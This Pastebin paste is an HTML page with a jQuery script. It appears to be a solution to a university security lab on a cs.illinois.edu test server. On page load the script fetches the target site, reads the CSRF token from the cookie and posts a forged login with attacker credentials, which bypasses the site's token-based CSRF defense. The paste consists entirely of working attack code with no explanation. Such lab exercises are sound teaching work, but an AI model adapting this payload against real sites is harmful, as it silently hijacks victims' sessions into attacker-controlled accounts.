Advertisement
Guest User

Untitled

a guest
Dec 14th, 2017
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  4.  
  5. function getCookie(cname) {
  6. var name = cname + "=";
  7. var ca = document.cookie.split(";");
  8. for(var i=0; i<ca.length; i++) {
  9. var c = ca[i];
  10. while (c.charAt(0)==" ") {
  11. c = c.substring(1);
  12. }
  13. if (c.indexOf(name) != -1) {
  14. return c.substring(name.length,c.length);
  15. }
  16. }
  17. return "";
  18. };
  19.  
  20. function post(token) {
  21. $.ajax({
  22. type: "POST",
  23. url: "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0",
  24. dataType: "text",
  25. data: {
  26. username: "attacker",
  27. password: "l33th4x",
  28. csrf_token: token
  29. }
  30. });
  31. }
  32.  
  33. $(document).ready(function() {
  34.  
  35. $.ajax({
  36. type: "GET",
  37. url: "http://trurl.cs.illinois.edu/?csrfdefense=1&xssdefense=0",
  38. success: function(){
  39. var token = getCookie("csrf_token");
  40. post(token);
  41. }
  42. });
  43. });
  44. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement